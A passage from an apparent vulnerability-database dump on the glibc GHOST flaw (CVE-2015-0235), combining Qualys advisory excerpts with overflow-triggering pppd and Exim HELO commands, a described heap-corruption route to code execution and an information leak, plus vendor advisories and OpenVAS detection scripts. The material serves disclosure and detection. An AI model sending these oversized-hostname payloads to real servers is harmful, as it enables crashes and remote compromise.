]----------------------------------------------\r\n\r\nstatic int\r\nsetwinsaddr(argv)\r\n char **argv;\r\n{\r\n u_int32_t wins;\r\n struct hostent *hp;\r\n\r\n wins = inet_addr(*argv);\r\n if (wins == (u_int32_t) -1) {\r\n if ((hp = gethostbyname(*argv)) == NULL) {\r\n option_error("invalid address parameter '%s' for ms-wins option",\r\n *argv);\r\n return 0;\r\n }\r\n wins = *(u_int32_t *)hp->h_addr;\r\n }\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'dryrun' 'ms-wins' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255'\r\n*** glibc detected *** /usr/sbin/pppd: free(): invalid next size (normal): 0x08a64928 ***\r\n======= Backtrace: =========\r\n/lib/i386-linux-gnu/libc.so.6(+0x75ee2)[0xb757aee2]\r\n/lib/i386-linux-gnu/libc.so.6(+0x65db5)[0xb756adb5]\r\n/lib/i386-linux-gnu/libc.so.6(fopen+0x2b)[0xb756adeb]\r\n/usr/sbin/pppd(options_from_file+0xa8)[0x8064948]\r\n/usr/sbin/pppd(options_for_tty+0xde)[0x8064d7e]\r\n/usr/sbin/pppd(tty_process_extra_options+0xa4)[0x806e1a4]\r\n/usr/sbin/pppd(main+0x1cf)[0x8050b2f]\r\n/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb751e4d3]\r\n======= Memory map: ========\r\n...\r\n08a61000-08a82000 rw-p 00000000 00:00 0 [heap]\r\n...\r\nAborted (core dumped)\r\n\r\n------[ 4.6.3 - socket option ]-----------------------------------------------\r\n\r\nstatic int\r\nopen_socket(dest)\r\n char *dest;\r\n{\r\n char *sep, *endp = NULL;\r\n int sock, port = -1;\r\n u_int32_t host;\r\n struct hostent *hent;\r\n ...\r\n sep = strchr(dest, ':');\r\n if (sep != NULL)\r\n port = strtol(sep+1, &endp, 10);\r\n if (port < 0 || endp == sep+1 || sep == dest) {\r\n error("Can't parse host:port for socket destination");\r\n return -1;\r\n }\r\n *sep = 0;\r\n host = inet_addr(dest);\r\n if (host == (u_int32_t) -1) {\r\n hent = gethostbyname(dest);\r\n if (hent == NULL) {\r\n error("%s: unknown host in socket option", dest);\r\n *sep = ':';\r\n return -1;\r\n }\r\n host = *(u_int32_t *)(hent->h_addr_list[0]);\r\n 
}\r\n\r\nuser@ubuntu-12-04-32b:~$ /usr/sbin/pppd 'socket' `python -c "print '0' * $((0x1000-16*1-2*4-16-4))"`'377.255.255.255:1'\r\nuser@ubuntu-12-04-32b:~$ *** glibc detected *** /usr/sbin/pppd: malloc(): memory corruption: 0x09cce270 ***\r\n\r\n----[ 4.7 - Exim ]------------------------------------------------------------\r\n\r\nThe Exim mail server is exploitable remotely if configured to perform\r\nextra security checks on the HELO and EHLO commands ("helo_verify_hosts"\r\nor "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed\r\na reliable and fully-functional exploit that bypasses all existing\r\nprotections (ASLR, PIE, NX) on 32-bit and 64-bit machines.\r\n\r\nuser@debian-7-7-64b:~$ grep helo /var/lib/exim4/config.autogenerated | grep verify\r\nhelo_verify_hosts = *\r\n\r\nuser@debian-7-7-64b:~$ python -c "print '0' * $((0x500-16*1-2*8-1-8))"\r\n0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\n\r\nuser@debian-7-7-64b:~$ telnet 127.0.0.1 25\r\nTrying 127.0.0.1...\r\nConnected to 127.0.0.1.\r\nEscape character is '^]'.\r\n220 debian-7-7-64b ESMTP Exim 4.80 ...\r\nHELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\r\nConnection closed by foreign host.\r\n\r\nuser@debian-7-7-64b:~$ dmesg\r\n...\r\n[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]\r\n\r\n\r\n--[ 5 - Exploitation ]--------------------------------------------------------\r\n\r\n----[ 5.1 - Code execution ]--------------------------------------------------\r\n\r\nIn this section, we describe how we achieve remote 
code execution\r\nagainst the Exim SMTP mail server, bypassing the NX (No-eXecute)\r\nprotection and glibc's malloc hardening.\r\n\r\nFirst, we overflow gethostbyname's heap-based buffer and partially\r\noverwrite the size field of the next contiguous free chunk of memory\r\nwith a slightly larger size (we overwrite only 3 bytes of the size\r\nfield; in any case, we cannot overflow more than 4 bytes on 32-bit\r\nmachines, or 8 bytes on 64-bit machines):\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|---+--------------------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| free chunk | ...\r\n-----|----------------------|---+--------------------|-----\r\n | X|\r\n |------------------------->|\r\n overflow\r\n\r\nwhere:\r\n\r\nstruct malloc_chunk {\r\n\r\n INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */\r\n INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */\r\n\r\n struct malloc_chunk* fd; /* double links -- used only if free. */\r\n struct malloc_chunk* bk;\r\n\r\n /* Only used for large blocks: pointer to next larger size. */\r\n struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */\r\n struct malloc_chunk* bk_nextsize;\r\n};\r\n\r\nand: X marks the spot where the crucial memory corruption takes place.\r\n\r\n\r\nAs a result, this artificially-enlarged free chunk, which is managed by\r\nglibc's malloc, overlaps another block of memory, Exim's current_block,\r\nwhich is managed by Exim's internal memory allocator:\r\n\r\n\r\n |< malloc_chunk |< storeblock\r\n | |\r\n-----|----------------------|------------------------|---------------+---|-----\r\n ... 
| gethostbyname buffer |p|s|f|b|F|B| free chunk |n|l| current_block | ...\r\n-----|----------------------|------------------------|---------------+---|-----\r\n | |\r\n |<-------------------------------------->|\r\n artificially enlarged free chunk\r\n\r\nwhere:\r\n\r\ntypedef struct storeblock {\r\n struct storeblock *next;\r\n size_t length;\r\n} storeblock;\r\n\r\n\r\nThen, we partially allocate the enlarged free chunk and overwrite the\r\nbeginning of Exim's current_block of memory (the "storeblock" structure)\r\nwith arbitrary data. In particular, we overwrite its "next" field:\r\n\r\n\r\n |< malloc_chunk |< storeblock\r\n | |\r\n-----|----------------------|------------------------|--------+----------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaaaaa |n|l| current_block | ...\r\n-----|----------------------|------------------------|--------+----------|-----\r\n | X |\r\n |<------------------------------->|\r\n allocated chunk\r\n\r\n\r\nThis effectively turns gethostbyname's buffer overflow into a\r\nwrite-anything-anywhere primitive, because we control both the pointer\r\nto the next block of memory returned by Exim's allocator (the hijacked\r\n"next" pointer) and the data allocated (a null-terminated string, the\r\nargument of an SMTP command we send to Exim).\r\n\r\nFinally, we use this write-anything-anywhere primitive to overwrite\r\nExim's run-time configuration, which is cached in the heap memory. More\r\nprecisely, we overwrite Exim's Access Control Lists (ACLs), and achieve\r\narbitrary command execution thanks to Exim's "${run{<command> <args>}}"\r\nstring expansion mechanism:\r\n\r\n |< storeblock\r\n |\r\n-----|-------------------------------|---------------|-------------------|-----\r\n ... | Exim's run-time configuration | ... .. .. ... 
|n|l| current_block | ...\r\n-----|----x--------------------------|---------------|x------------------|-----\r\n | |\r\n '<------------------------------------------'\r\n hijacked next pointer\r\n\r\n\r\n |< ACLs >|\r\n-----|----+-----+--------+------+----|---------------|-------------------|-----\r\n ... | Exim's run-time configuration | ... .. .. ... | old current_block | ...\r\n-----|----+-----+--------+------+----|---------------|-------------------|-----\r\n | XXXXXXXX |\r\n |<------------------->|\r\n new current_block\r\n\r\n\r\n----[ 5.2 - Information leak ]------------------------------------------------\r\n\r\nThe success of this exploit depends on an important piece of\r\ninformation: the address of Exim's run-time configuration in the heap.\r\nIn this section, we describe how we obtain this address, bypassing the\r\nASLR (Address Space Layout Randomization) and PIE (Position Independent\r\nExecutable) protections.\r\n\r\nFirst, we overflow gethostbyname's heap-based buffer and partially\r\noverwrite the size field of the next contiguous free chunk of memory\r\nwith a slightly larger size:\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|---+-------------------------|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ...\r\n-----|----------------------|---+-------------------------|-----\r\n | X|\r\n |------------------------->|\r\n overflow\r\n\r\n\r\nAs a result, this artificially-enlarged free chunk overlaps another\r\nblock of memory, where Exim saves the error message "503 sender not yet\r\ngiven\r\n" for later use:\r\n\r\n\r\n |< malloc_chunk\r\n |\r\n-----|----------------------|-----------------------------|----------+----|-----\r\n ... 
| gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ...\r\n-----|----------------------|-----------------------------|----------+----|-----\r\n | |\r\n |<-------------------------------------->|\r\n artificially enlarged free chunk\r\n\r\n\r\nThen, we partially allocate the artificially-enlarged free chunk,\r\nthereby splitting it in two: the newly allocated chunk, and a smaller,\r\nfree chunk (the remainder from the split). The malloc_chunk header for\r\nthis remaining free chunk overwrites the very beginning of the saved\r\nerror message with a pointer to the heap (the fd_nextsize pointer):\r\n\r\n\r\n |< malloc_chunk |< malloc_chunk\r\n | |\r\n-----|----------------------|---------------------+-------|----------+----|-----\r\n ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ...\r\n-----|----------------------|---------------------+-------|----------+----|-----\r\n | | X |\r\n |<------------------->|<---------------->|\r\n allocated chunk free chunk\r\n\r\n\r\nFinally, we send an invalid SMTP command to Exim, and retrieve the\r\nfd_nextsize heap pointer from Exim's SMTP response, which includes the\r\ncorrupted error message. 
This effectively turns gethostbyname's buffer\r\noverflow into an information leak; moreover, it allows us to distinguish\r\nbetween 32-bit and 64-bit machines.\r\n\r\n\r\n--[ 6 - Acknowledgments ]-----------------------------------------------------\r\n\r\nWe would like to thank Alexander Peslyak of the Openwall Project for his\r\nhelp with the disclosure process of this vulnerability.\r\n\r\n", "modified": "2015-02-02T00:00:00", "published": "2015-02-02T00:00:00", "id": "SECURITYVULNS:DOC:31672", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31672", "title": "Qualys Security Advisory CVE-2015-0235 - GHOST: glibc gethostbyname buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "Buffer overflow in __nss_hostname_digits_dots().", "modified": "2015-02-02T00:00:00", "published": "2015-02-02T00:00:00", "id": "SECURITYVULNS:VULN:14240", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14240", "title": "GNU glibc gethostbyname functions buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:44", "bulletinFamily": "unix", "description": "\nRobert Krátký reports:\n\n\n\t GHOST is a 'buffer overflow' bug affecting the gethostbyname() and\n\t gethostbyname2() function calls in the glibc library. This\n\t vulnerability allows a remote attacker that is able to make an\n\t application call to either of these functions to execute arbitrary\n\t code with the permissions of the user running the application.\n\t The gethostbyname() function calls are used for DNS resolving, which\n\t is a very common event. 
To exploit this vulnerability, an attacker\n\t must trigger a buffer overflow by supplying an invalid hostname\n\t argument to an application that performs a DNS resolution.\n\n", "modified": "2015-02-02T00:00:00", "published": "2015-01-27T00:00:00", "id": "0765DE84-A6C1-11E4-A0C1-C485083CA99C", "href": "https://vuxml.freebsd.org/freebsd/0765de84-a6c1-11e4-a0c1-c485083ca99c.html", "title": "glibc -- gethostbyname buffer overflow", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:14:44", "bulletinFamily": "unix", "description": "\nThe PHP Project reports:\n\nUse after free vulnerability in unserialize() with DateTimeZone.\nMitigation for CVE-2015-0235 -- GHOST: glibc gethostbyname buffer\n\t overflow.\n\n", "modified": "2015-02-18T00:00:00", "published": "2015-02-18T00:00:00", "id": "F7A9E415-BDCA-11E4-970C-000C292EE6B8", "href": "https://vuxml.freebsd.org/freebsd/f7a9e415-bdca-11e4-970c-000c292ee6b8.html", "title": "php5 -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:40:54", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:14:39", "published": "2015-01-28T05:00:00", "id": "RHSA-2015:0099", "href": "https://access.redhat.com/errata/RHSA-2015:0099", "type": "redhat", "title": "(RHSA-2015:0099) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:57", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:15:54", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0090", "href": "https://access.redhat.com/errata/RHSA-2015:0090", "type": "redhat", "title": "(RHSA-2015:0090) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:44:32", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:10:28", "published": "2015-01-28T05:00:00", "id": "RHSA-2015:0101", "href": "https://access.redhat.com/errata/RHSA-2015:0101", "type": "redhat", "title": "(RHSA-2015:0101) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T19:43:33", "bulletinFamily": "unix", "description": "The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. 
(CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:08", "published": "2015-01-27T05:00:00", "id": "RHSA-2015:0092", "href": "https://access.redhat.com/errata/RHSA-2015:0092", "type": "redhat", "title": "(RHSA-2015:0092) Critical: glibc security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-28T18:24:51", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0092", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123197", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123197", "title": "Oracle Linux Local Check: ELSA-2015-0092", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0092.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123197\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:00:35 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-0092\");\n script_tag(name:\"insight\", value:\"ELSA-2015-0092 - glibc security update for Oracle Linux 7. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-0092\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-0092.html\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", 
rpm:\"glibc~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.0.4.el7_0.5\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", 
rpm:\"glibc-utils~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.149.el6_6.5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:39:32", "bulletinFamily": "scanner", "description": "The remote exim is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.", "modified": "2018-10-12T00:00:00", "published": "2015-01-29T00:00:00", "id": "OPENVAS:1361412562310105188", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105188", "title": "GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_exim_ghost_72325.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:exim:exim';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105188\");\n script_bugtraq_id(72325);\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11872 $\");\n\n script_name(\"GNU glibc Remote Heap Buffer Overflow Vulnerability (Exim)\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/72325\");\n script_xref(name:\"URL\", value:\"http://www.gnu.org/software/libc/\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute arbitrary code in the\ncontext of the affected application. 
Failed exploit attempts may crash the application, denying service\n to legitimate users.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HELO request and check the response\");\n script_tag(name:\"solution\", value:\"Update you glibc and reboot.\");\n script_tag(name:\"summary\", value:\"The remote exim is using a version of glibc which is prone to a heap-based buffer-overflow\nvulnerability.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-29 15:17:02 +0100 (Thu, 29 Jan 2015)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"SMTP problems\");\n script_copyright(\"This script is Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_exim_detect.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_mandatory_keys(\"exim/installed\");\n\n exit(0);\n}\n\ninclude(\"smtp_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nrecv( socket:soc, length:512 );\n\nsend( socket:soc, data:'HELO FOOBAR\\r\\n' );\nrecv = recv( socket:soc, length:512 );\nclose( soc );\n\nif( \"550 HELO argument does not match calling host\" >!< recv ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc ) exit( 0 );\n\nrecv = recv( socket:soc, length:512 );\n\nreq = 'HELO ' + crap( data:\"0\", length:1235 ) + '\\r\\n';\n\nfor( i = 1; i < 5; i++ )\n{\n send( socket:soc, data:req );\n recv = recv( socket:soc, length:512 );\n\n if( ! 
recv )\n {\n if( ( i == 2 || i == 4 ) && socket_get_error( soc ) == ECONNRESET ) # 2 times for 32bit, 4 times for 64bit\n {\n close( soc );\n security_message( port:port );\n exit( 0 );\n }\n }\n}\n\nif( soc ) close( soc );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:24:47", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-0090", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123196", "title": "Oracle Linux Local Check: ELSA-2015-0090", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-0090.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
